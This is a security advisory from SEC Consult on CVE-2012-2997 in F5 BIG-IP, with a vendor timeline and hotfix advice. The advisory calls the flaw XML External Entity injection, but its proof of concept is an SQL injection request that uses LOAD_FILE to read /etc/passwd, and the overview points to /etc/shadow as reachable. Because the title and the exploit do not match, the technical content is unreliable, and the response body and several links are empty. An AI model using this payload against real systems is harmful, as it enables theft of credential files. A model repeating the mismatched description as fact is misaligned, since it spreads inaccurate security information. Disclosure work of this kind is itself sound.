XML External Entity Injection (XXE) in F5 BIG-IP

SEC Consult Vulnerability Lab Security Advisory < 20130122-0 >


title: XML External Entity Injection (XXE)

product: F5 BIG-IP

vulnerable version: <=11.2.0

fixed version: 11.2.0 HF3

11.2.1 HF3

CVE number: CVE-2012-2997

impact: Medium

homepage: www.f5.com

found: 2012-09-03

by: S. Viehböck

SEC Consult Vulnerability Lab



Vendor/product description:


"The BIG-IP product suite is a system of application delivery services that

work together on the same best-in-class hardware platform or software virtual

instance. From load balancing and service offloading to acceleration and

security, the BIG-IP system delivers agility—and ensures your applications

are fast, secure, and available."

URL: www.f5.com/products/big-ip/


Vulnerability overview/description:


An XML External Entity Injection (XXE) vulnerability exists in a BIG-IP

component. This enables an authenticated attacker to download arbitrary files

from the file system with the rights of the "apache" OS user. The BIG-IP

configuration even allows access to the critical /etc/shadow file which

contains the password hashes of users.


Proof of concept:


The following exploit shows how files can be extracted from the file system:

POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119

    "id": 2,
    "defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) -- x"

Note: target fields are only VARCHAR(60) thus MID() is used for extracting

A request to /sam/admin/reports/php/getSettings.php returns the data:

HTTP/1.1 200 OK



Vulnerable / tested versions:


The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.

No modules have to be enabled for successful exploitation.


Vendor contact timeline:


2012-09-07: Contacting vendor - reqesting PGP/SMIME key.

2012-09-07: Vendor provides case number and PGP key.

2012-09-11: Sending advisory draft and proof of concept.

2012-09-20: Vendor has a fix for the vulnerability - will be released "with different hot fixes for different releases".

2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 11.2.1 HF3.

2013-01-22: SEC Consult releases coordinated security advisory.




Update to 11.2.0 HF3 or 11.2.1 HF3.

Patch information is also available at:





No workaround available.


Advisory URL:





SEC Consult Unternehmensberatung GmbH

Office Vienna

Mooslackengasse 17

A-1190 Vienna


Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com



EOF S. Viehböck / @2013